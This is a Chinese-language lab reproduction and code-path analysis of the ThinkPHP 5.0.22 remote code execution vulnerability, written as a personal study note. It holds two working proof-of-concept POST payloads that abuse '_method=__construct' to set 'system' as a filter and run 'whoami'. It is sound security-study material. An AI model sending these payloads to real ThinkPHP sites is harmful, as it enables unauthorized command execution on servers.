data:image/s3,"s3://crabby-images/380ef/380ef8ee9a75072a15e6cf4dabadf78f768dd7fc" alt="image-20211117223456251"
漏洞概要
漏洞存在于 ThinkPHP 底层没有对控制器名进行很好的合法性校验,导致在未开启强制路由的情况下,用户可以调用任意类的任意方法,最终导致 远程代码执行漏洞 的产生。
环境搭建:
Phpstudy:
- OS:
Windows - PHP:
7.3.4 - ThinkPHP:
5.0.22
POC
http://xxxxxx.xxx/public/?s=captcha
Body
_method=__construct&filter[]=system&method=get&get[]=whoami
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami
复现分析
POC 1
data:image/s3,"s3://crabby-images/fce9e/fce9e2d9413b2a566d39ae11bd317c3e51d36184" alt="image-20211118172356063"
调试分析,Thinkphp的程序是从App.php 开始的,在App::run 中,先通过$dispatch = self::routeCheck($request, $config); 对路由进行检测
data:image/s3,"s3://crabby-images/9f383/9f3834f80686c535949c805ab9ed1ff7f419464f" alt="image-20211118164531151"
在该方法中,又调用了Route::check 方法,跟进
data:image/s3,"s3://crabby-images/689ab/689ab420d2a9992d97ef35d3f97258de4bc9178a" alt="image-20211118164903693"
存在$method = strtolower($request->method()); ,跟进method 方法,进入了Request.php
data:image/s3,"s3://crabby-images/0de4b/0de4b094dc2dc36133d6809683aad97bf22dcd5e" alt="image-20211118165239755"
默认$method = false 时进入分支条件
注意到:$this->method = strtoupper($_POST[Config::get('var_method')]);
这里的var_method 对应_method ,在Config.php 中
$method 来自可控的 $_POST 数组,而且在获取之后没有进行任何检查,直接把它作为 Request 类的方法进行调用,同时,该方法传入的参数是可控数据 $_POST 。也就相当于可以随意调用 Request 类的部分方法。
我们传入的参数:_method=__construct&filter[]=system&method=get&get[]=whoami
它会调用__construct 方法,而该方法中有类属性覆盖功能
data:image/s3,"s3://crabby-images/3e7c2/3e7c239574efd816c05546b5cff534352378dbdc" alt="image-20211118174942348"
那么在结束method方法时,我们需要返回参数$this->method 为get
data:image/s3,"s3://crabby-images/4abdb/4abdb851d62a9374fd867c2870e27051fdaf47fa" alt="image-20211118163556291"
继续分析
data:image/s3,"s3://crabby-images/2dacb/2dacb4e29873820c10d2af141e2a43867230bcf9" alt="image-20211118225550588"
进入了exec方法,?s=captcha 就可以让$dispatch['type'] 是method
在 ThinkPHP5 完整版中,定义了验证码类的路由地址。程序在初始化时,会通过自动类加载机制,将 vendor 目录下的文件加载,这样在 GET 方式中便多了这一条路由。我们便可以利用这一路由地址,使得 $dispatch['type'] 等于 method ,从而完成 远程代码执行 漏洞。
进入Request::instance()->param()
data:image/s3,"s3://crabby-images/9e690/9e6900b04f7acd8b6775c61be60b6f73dd0a9279" alt="image-20211118230712251"
data:image/s3,"s3://crabby-images/bf497/bf497b6dd1e18db570824ab77212ae3650277e99" alt="image-20211118230837911"
$this->param 通过array_merge 将当前请求参数和URL地址中的参数合并。
跟进get方法
data:image/s3,"s3://crabby-images/922ea/922ea59c9d574dfb83704a7332880df3a413b6a3" alt="image-20211118231215186"
由于之前的变量覆盖get有值
data:image/s3,"s3://crabby-images/33041/330417ebfe5d1ce5b5c7f9020c356dca1b2e2eb5" alt="image-20211118232034784"
所以会进入input 方法
data:image/s3,"s3://crabby-images/0aab2/0aab2ef77223d5b9b5425e17ae861be2ce293f43" alt="image-20211118232333297"
它返回了get数组值,而$this->param 也会有值
data:image/s3,"s3://crabby-images/44b60/44b608f83a3bf8a7fd45e80c1463ca6d30ffb288" alt="image-20211118232755497"
接着我们再次进入input方法
data:image/s3,"s3://crabby-images/c022a/c022afdcff61fccde9fe7ec7c9a189db39b3dffe" alt="image-20211118232920377"
进入解析过滤器
data:image/s3,"s3://crabby-images/1675d/1675dac8de0a6a472b2e2f0f8265b2fe2c548af0" alt="image-20211118233244683"
发现是通过$filter 参数获取的方法,由之前的变量覆盖
data:image/s3,"s3://crabby-images/b3ede/b3ede07c48795bb2268aec3ec6cb6b24ab484c1d" alt="image-20211118233508379"
那么array_walk_recursive($data, [$this, 'filterValue'], $filter); 会调用filterValue 方法
data:image/s3,"s3://crabby-images/e40aa/e40aa1b6626f812f45373e5c5817e5766508fddc" alt="image-20211118234154433"
之后就通过回调函数进行RCE
该调用链的payload:
http://xxxxxx.xxx/public/?s=captcha
POST:
_method=__construct&filter[]=system&method=get&get[]=whoami
POC 2
data:image/s3,"s3://crabby-images/832c1/832c148c0673b2e16bf7c283dca9e1ea2bc6d078" alt="image-20211119000336365"
data:image/s3,"s3://crabby-images/114d0/114d0a0da41988aef4fbb75898c82bedc59fdd27" alt="image-20211118234630188"
跟进一下method() 方法,这里的$method 是true:
data:image/s3,"s3://crabby-images/4875b/4875b43ff92072e2d4a7c988696cec84752430d7" alt="image-20211118235037615"
继续跟进server 方法
data:image/s3,"s3://crabby-images/b4ca6/b4ca6c4e2522e08826ea274b2c93982a1360887a" alt="image-20211118235123426"
这里也有input方法
return $this->server('REQUEST_METHOD') ?: 'GET';
这里的name为REQUEST_METHOD ,第一个参数$this->server 可以利用之前__construct() 方法进行属性覆盖,设置server[REQUEST_METHOD]=whoami ,之后会调用到getFilter() ,于是分析思路和上一个相似,最终调用回调函数进行RCE
总结
来自一位师傅:
data:image/s3,"s3://crabby-images/29936/299364bb45248eefe8e24ef413d544c7836469be" alt="在这里插入图片描述"
该复现过程基本是跟着Y4师傅来的,很多地方现在理解也不是很清楚,希望以后能继续完善吧!
继续努力!
|